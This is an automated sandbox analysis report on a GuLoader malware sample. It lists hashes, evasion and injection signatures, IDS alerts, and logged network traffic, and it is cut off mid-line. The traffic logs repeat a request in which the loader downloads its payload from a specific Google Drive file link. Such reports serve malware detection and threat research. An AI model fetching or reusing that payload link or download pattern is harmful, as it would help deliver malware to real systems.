Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MNLS4PjscF.exe

Overview

General Information

Sample name:MNLS4PjscF.exe
renamed because original name is a hash value
Original sample name:2baf2894d28fffff439499fbcd6b92714febd8ea39c0850f60f4575adedef15b.exe
Analysis ID:1632411
MD5:7730242b95171f0ccb03e28bf8f5056b
SHA1:a5348671e4b92b3c64086abe6fced83f251e692c
SHA256:2baf2894d28fffff439499fbcd6b92714febd8ea39c0850f60f4575adedef15b
Tags:AdwareGenericexeuser-adrian__luca
Infos:

Detection

GuLoader
Score:84
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Joe Sandbox ML detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • MNLS4PjscF.exe (PID: 7276 cmdline: "C:\Users\user\Desktop\MNLS4PjscF.exe" MD5: 7730242B95171F0CCB03E28BF8F5056B)
    • MNLS4PjscF.exe (PID: 5684 cmdline: "C:\Users\user\Desktop\MNLS4PjscF.exe" MD5: 7730242B95171F0CCB03E28BF8F5056B)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
00000000.00000002.1551650221.000000000A349000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    Process Memory Space: MNLS4PjscF.exe PID: 7276JoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
      No Sigma rule has matched
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-03-07T23:30:47.020893+010028032702Potentially Bad Traffic192.168.2.749688142.250.186.142443TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: MNLS4PjscF.exeAvira: detected
      Source: MNLS4PjscF.exeVirustotal: Detection: 66%Perma Link
      Source: MNLS4PjscF.exeReversingLabs: Detection: 60%
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: MNLS4PjscF.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.7:49688 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.7:49689 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.7:49693 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.7:49695 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.7:49699 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.7:49701 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.7:49703 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.7:49705 version: TLS 1.2
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeCode function: 0_2_0040276E FindFirstFileW,0_2_0040276E
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeCode function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405770
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeCode function: 0_2_0040622B FindFirstFileW,FindClose,0_2_0040622B
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeCode function: 8_2_0040276E FindFirstFileW,8_2_0040276E
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeCode function: 8_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,8_2_00405770
      Source: C:\Users\user\Desktop\MNLS4PjscF.exeCode function: 8_2_0040622B FindFirstFileW,FindClose,8_2_0040622B
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49688 -> 142.250.186.142:443
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cacheCookie: NID=522=dav52gsBSilSlpCodFXcTUF0lZ4vC8O6Ux5nwJlvN1WHGzJ4TkypemSFXEfC4EazYsJuIAIB3uraTGbJ0nrjh9jgbc8tmHxvbPk9l_MsSqSHSpbakPb15PJ2z51FMoVk3Wyz4qyhPG1ZvinmrqwjKAXjjqGhXR6J3zoef1kmzZkmUBISOCo4_U54dl830oJjOA
      Source: global trafficHTTP traffic detected: GET /download?id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=522=dav52gsBSilSlpCodFXcTUF0lZ4vC8O6Ux5nwJlvN1WHGzJ4TkypemSFXEfC4EazYsJuIAIB3uraTGbJ0nrjh9jgbc8tmHxvbPk9l_MsSqSHSpbakPb15PJ2z51FMoVk3Wyz4qyhPG1ZvinmrqwjKAXjjqGhXR6J3zoef1kmzZkmUBISOCo4_U54dl830oJjOA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cacheCookie: NID=522=dav52gsBSilSlpCodFXcTUF0lZ4vC8O6Ux5nwJlvN1WHGzJ4TkypemSFXEfC4EazYsJuIAIB3uraTGbJ0nrjh9jgbc8tmHxvbPk9l_MsSqSHSpbakPb15PJ2z51FMoVk3Wyz4qyhPG1ZvinmrqwjKAXjjqGhXR6J3zoef1kmzZkmUBISOCo4_U54dl830oJjOA
      Source: global trafficHTTP traffic detected: GET /download?id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=522=dav52gsBSilSlpCodFXcTUF0lZ4vC8O6Ux5nwJlvN1WHGzJ4TkypemSFXEfC4EazYsJuIAIB3uraTGbJ0nrjh9jgbc8tmHxvbPk9l_MsSqSHSpbakPb15PJ2z51FMoVk3Wyz4qyhPG1ZvinmrqwjKAXjjqGhXR6J3zoef1kmzZkmUBISOCo4_U54dl830oJjOA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cacheCookie: NID=522=dav52gsBSilSlpCodFXcTUF0lZ4vC8O6Ux5nwJlvN1WHGzJ4TkypemSFXEfC4EazYsJuIAIB3uraTGbJ0nrjh9jgbc8tmHxvbPk9l_MsSqSHSpbakPb15PJ2z51FMoVk3Wyz4qyhPG1ZvinmrqwjKAXjjqGhXR6J3zoef1kmzZkmUBISOCo4_U54dl830oJjOA
      Source: global trafficHTTP traffic detected: GET /download?id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=522=dav52gsBSilSlpCodFXcTUF0lZ4vC8O6Ux5nwJlvN1WHGzJ4TkypemSFXEfC4EazYsJuIAIB3uraTGbJ0nrjh9jgbc8tmHxvbPk9l_MsSqSHSpbakPb15PJ2z51FMoVk3Wyz4qyhPG1ZvinmrqwjKAXjjqGhXR6J3zoef1kmzZkmUBISOCo4_U54dl830oJjOA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cacheCookie: NID=522=dav52gsBSilSlpCodFXcTUF0lZ4vC8O6Ux5nwJlvN1WHGzJ4TkypemSFXEfC4EazYsJuIAIB3uraTGbJ0nrjh9jgbc8tmHxvbPk9l_MsSqSHSpbakPb15PJ2z51FMoVk3Wyz4qyhPG1ZvinmrqwjKAXjjqGhXR6J3zoef1kmzZkmUBISOCo4_U54dl830oJjOA
      Source: global trafficHTTP traffic detected: GET /download?id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=522=dav52gsBSilSlpCodFXcTUF0lZ4vC8O6Ux5nwJlvN1WHGzJ4TkypemSFXEfC4EazYsJuIAIB3uraTGbJ0nrjh9jgbc8tmHxvbPk9l_MsSqSHSpbakPb15PJ2z51FMoVk3Wyz4qyhPG1ZvinmrqwjKAXjjqGhXR6J3zoef1kmzZkmUBISOCo4_U54dl830oJjOA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cacheCookie: NID=522=dav52gsBSilSlpCodFXcTUF0lZ4vC8O6Ux5nwJlvN1WHGzJ4TkypemSFXEfC4EazYsJuIAIB3uraTGbJ0nrjh9jgbc8tmHxvbPk9l_MsSqSHSpbakPb15PJ2z51FMoVk3Wyz4qyhPG1ZvinmrqwjKAXjjqGhXR6J3zoef1kmzZkmUBISOCo4_U54dl830oJjOA
      Source: global trafficHTTP traffic detected: GET /download?id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=522=dav52gsBSilSlpCodFXcTUF0lZ4vC8O6Ux5nwJlvN1WHGzJ4TkypemSFXEfC4EazYsJuIAIB3uraTGbJ0nrjh9jgbc8tmHxvbPk9l_MsSqSHSpbakPb15PJ2z51FMoVk3Wyz4qyhPG1ZvinmrqwjKAXjjqGhXR6J3zoef1kmzZkmUBISOCo4_U54dl830oJjOA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cacheCookie: NID=522=dav52gsBSilSlpCodFXcTUF0lZ4vC8O6Ux5nwJlvN1WHGzJ4TkypemSFXEfC4EazYsJuIAIB3uraTGbJ0nrjh9jgbc8tmHxvbPk9l_MsSqSHSpbakPb15PJ2z51FMoVk3Wyz4qyhPG1ZvinmrqwjKAXjjqGhXR6J3zoef1kmzZkmUBISOCo4_U54dl830oJjOA
      Source: global trafficHTTP traffic detected: GET /download?id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=522=dav52gsBSilSlpCodFXcTUF0lZ4vC8O6Ux5nwJlvN1WHGzJ4TkypemSFXEfC4EazYsJuIAIB3uraTGbJ0nrjh9jgbc8tmHxvbPk9l_MsSqSHSpbakPb15PJ2z51FMoVk3Wyz4qyhPG1ZvinmrqwjKAXjjqGhXR6J3zoef1kmzZkmUBISOCo4_U54dl830oJjOA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cacheCookie: NID=522=dav52gsBSilSlpCodFXcTUF0lZ4vC8O6Ux5nwJlvN1WHGzJ4TkypemSFXEfC4EazYsJuIAIB3uraTGbJ0nrjh9jgbc8tmHxvbPk9l_MsSqSHSpbakPb15PJ2z51FMoVk3Wyz4qyhPG1ZvinmrqwjKAXjjqGhXR6J3zoef1kmzZkmUBISOCo4_U54dl830oJjOA
      Source: global trafficHTTP traffic detected: GET /download?id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=522=dav52gsBSilSlpCodFXcTUF0lZ4vC8O6Ux5nwJlvN1WHGzJ4TkypemSFXEfC4EazYsJuIAIB3uraTGbJ0nrjh9jgbc8tmHxvbPk9l_MsSqSHSpbakPb15PJ2z51FMoVk3Wyz4qyhPG1ZvinmrqwjKAXjjqGhXR6J3zoef1kmzZkmUBISOCo4_U54dl830oJjOA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cacheCookie: NID=522=dav52gsBSilSlpCodFXcTUF0lZ4vC8O6Ux5nwJlvN1WHGzJ4TkypemSFXEfC4EazYsJuIAIB3uraTGbJ0nrjh9jgbc8tmHxvbPk9l_MsSqSHSpbakPb15PJ2z51FMoVk3Wyz4qyhPG1ZvinmrqwjKAXjjqGhXR6J3zoef1kmzZkmUBISOCo4_U54dl830oJjOA
      Source: global trafficHTTP traffic detected: GET /download?id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=522=dav52gsBSilSlpCodFXcTUF0lZ4vC8O6Ux5nwJlvN1WHGzJ4TkypemSFXEfC4EazYsJuIAIB3uraTGbJ0nrjh9jgbc8tmHxvbPk9l_MsSqSHSpbakPb15PJ2z51FMoVk3Wyz4qyhPG1ZvinmrqwjKAXjjqGhXR6J3zoef1kmzZkmUBISOCo4_U54dl830oJjOA
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cacheCookie: NID=522=dav52gsBSilSlpCodFXcTUF0lZ4vC8O6Ux5nwJlvN1WHGzJ4TkypemSFXEfC4EazYsJuIAIB3uraTGbJ0nrjh9jgbc8tmHxvbPk9l_MsSqSHSpbakPb15PJ2z51FMoVk3Wyz4qyhPG1ZvinmrqwjKAXjjqGhXR6J3zoef1kmzZkmUBISOCo4_U54dl830oJjOA
      Source: global trafficHTTP traffic detected: GET /download?id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=522=dav52gsBSilSlpCodFXcTUF0lZ4vC8O6Ux5nwJlvN1WHGzJ4TkypemSFXEfC4EazYsJuIAIB3uraTGbJ0nrjh9jgbc8tmHxvbPk9l_MsSqSHSpbakPb15PJ2z51FMoVk3Wyz4qyhPG1ZvinmrqwjKAXjjqGhXR6J3zoef1kmzZkmUBISOCo4_U54dl830oJjOA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cacheCookie: NID=522=dav52gsBSilSlpCodFXcTUF0lZ4vC8O6Ux5nwJlvN1WHGzJ4TkypemSFXEfC4EazYsJuIAIB3uraTGbJ0nrjh9jgbc8tmHxvbPk9l_MsSqSHSpbakPb15PJ2z51FMoVk3Wyz4qyhPG1ZvinmrqwjKAXjjqGhXR6J3zoef1kmzZkmUBISOCo4_U54dl830oJjOA
      Source: global trafficHTTP traffic detected: GET /download?id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=522=dav52gsBSilSlpCodFXcTUF0lZ4vC8O6Ux5nwJlvN1WHGzJ4TkypemSFXEfC4EazYsJuIAIB3uraTGbJ0nrjh9jgbc8tmHxvbPk9l_MsSqSHSpbakPb15PJ2z51FMoVk3Wyz4qyhPG1ZvinmrqwjKAXjjqGhXR6J3zoef1kmzZkmUBISOCo4_U54dl830oJjOA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cacheCookie: NID=522=dav52gsBSilSlpCodFXcTUF0lZ4vC8O6Ux5nwJlvN1WHGzJ4TkypemSFXEfC4EazYsJuIAIB3uraTGbJ0nrjh9jgbc8tmHxvbPk9l_MsSqSHSpbakPb15PJ2z51FMoVk3Wyz4qyhPG1ZvinmrqwjKAXjjqGhXR6J3zoef1kmzZkmUBISOCo4_U54dl830oJjOA
      Source: global trafficHTTP traffic detected: GET /download?id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=522=dav52gsBSilSlpCodFXcTUF0lZ4vC8O6Ux5nwJlvN1WHGzJ4TkypemSFXEfC4EazYsJuIAIB3uraTGbJ0nrjh9jgbc8tmHxvbPk9l_MsSqSHSpbakPb15PJ2z51FMoVk3Wyz4qyhPG1ZvinmrqwjKAXjjqGhXR6J3zoef1kmzZkmUBISOCo4_U54dl830oJjOA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cacheCookie: NID=522=dav52gsBSilSlpCodFXcTUF0lZ4vC8O6Ux5nwJlvN1WHGzJ4TkypemSFXEfC4EazYsJuIAIB3uraTGbJ0nrjh9jgbc8tmHxvbPk9l_MsSqSHSpbakPb15PJ2z51FMoVk3Wyz4qyhPG1ZvinmrqwjKAXjjqGhXR6J3zoef1kmzZkmUBISOCo4_U54dl830oJjOA
      Source: global trafficHTTP traffic detected: GET /download?id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=522=dav52gsBSilSlpCodFXcTUF0lZ4vC8O6Ux5nwJlvN1WHGzJ4TkypemSFXEfC4EazYsJuIAIB3uraTGbJ0nrjh9jgbc8tmHxvbPk9l_MsSqSHSpbakPb15PJ2z51FMoVk3Wyz4qyhPG1ZvinmrqwjKAXjjqGhXR6J3zoef1kmzZkmUBISOCo4_U54dl830oJjOA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cacheCookie: NID=522=dav52gsBSilSlpCodFXcTUF0lZ4vC8O6Ux5nwJlvN1WHGzJ4TkypemSFXEfC4EazYsJuIAIB3uraTGbJ0nrjh9jgbc8tmHxvbPk9l_MsSqSHSpbakPb15PJ2z51FMoVk3Wyz4qyhPG1ZvinmrqwjKAXjjqGhXR6J3zoef1kmzZkmUBISOCo4_U54dl830oJjOA
      Source: global trafficHTTP traffic detected: GET /download?id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=522=dav52gsBSilSlpCodFXcTUF0lZ4vC8O6Ux5nwJlvN1WHGzJ4TkypemSFXEfC4EazYsJuIAIB3uraTGbJ0nrjh9jgbc8tmHxvbPk9l_MsSqSHSpbakPb15PJ2z51FMoVk3Wyz4qyhPG1ZvinmrqwjKAXjjqGhXR6J3zoef1kmzZkmUBISOCo4_U54dl830oJjOA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cacheCookie: NID=522=dav52gsBSilSlpCodFXcTUF0lZ4vC8O6Ux5nwJlvN1WHGzJ4TkypemSFXEfC4EazYsJuIAIB3uraTGbJ0nrjh9jgbc8tmHxvbPk9l_MsSqSHSpbakPb15PJ2z51FMoVk3Wyz4qyhPG1ZvinmrqwjKAXjjqGhXR6J3zoef1kmzZkmUBISOCo4_U54dl830oJjOA
      Source: global trafficHTTP traffic detected: GET /download?id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=522=dav52gsBSilSlpCodFXcTUF0lZ4vC8O6Ux5nwJlvN1WHGzJ4TkypemSFXEfC4EazYsJuIAIB3uraTGbJ0nrjh9jgbc8tmHxvbPk9l_MsSqSHSpbakPb15PJ2z51FMoVk3Wyz4qyhPG1ZvinmrqwjKAXjjqGhXR6J3zoef1kmzZkmUBISOCo4_U54dl830oJjOA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cacheCookie: NID=522=dav52gsBSilSlpCodFXcTUF0lZ4vC8O6Ux5nwJlvN1WHGzJ4TkypemSFXEfC4EazYsJuIAIB3uraTGbJ0nrjh9jgbc8tmHxvbPk9l_MsSqSHSpbakPb15PJ2z51FMoVk3Wyz4qyhPG1ZvinmrqwjKAXjjqGhXR6J3zoef1kmzZkmUBISOCo4_U54dl830oJjOA
      Source: global trafficHTTP traffic detected: GET /download?id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=522=dav52gsBSilSlpCodFXcTUF0lZ4vC8O6Ux5nwJlvN1WHGzJ4TkypemSFXEfC4EazYsJuIAIB3uraTGbJ0nrjh9jgbc8tmHxvbPk9l_MsSqSHSpbakPb15PJ2z51FMoVk3Wyz4qyhPG1ZvinmrqwjKAXjjqGhXR6J3zoef1kmzZkmUBISOCo4_U54dl830oJjOA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cacheCookie: NID=522=dav52gsBSilSlpCodFXcTUF0lZ4vC8O6Ux5nwJlvN1WHGzJ4TkypemSFXEfC4EazYsJuIAIB3uraTGbJ0nrjh9jgbc8tmHxvbPk9l_MsSqSHSpbakPb15PJ2z51FMoVk3Wyz4qyhPG1ZvinmrqwjKAXjjqGhXR6J3zoef1kmzZkmUBISOCo4_U54dl830oJjOA
      Source: global trafficHTTP traffic detected: GET /download?id=1xf907JeXelEi4jUTPht9u7UOKSY5Guxn&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=522=dav52gsBSilSlpCodFXcTUF0lZ4vC8O6Ux5nwJlvN1WHGzJ4TkypemSFXEfC4EazYsJuIAIB3uraTGbJ0nrjh9jgbc8tmHxvbPk9l_MsSqSHSpbakPb15PJ2z51FMoVk3Wyz4qyhPG1ZvinmrqwjKAXjjqGhXR6J3zoef1kmzZkmUBISOCo4_U54dl830oJjOA
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AKDAyIuN8ZUfOvJohGwebJsZMZ2an8uz0KiL4iotDf8dfkhWAWNLJol3R_d_b5HLe8JxWsCRzx3WAFoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 07 Mar 2025 22:30:49 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: script-src 'nonce-CiocIO1INPLh4xtvZkMR7A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 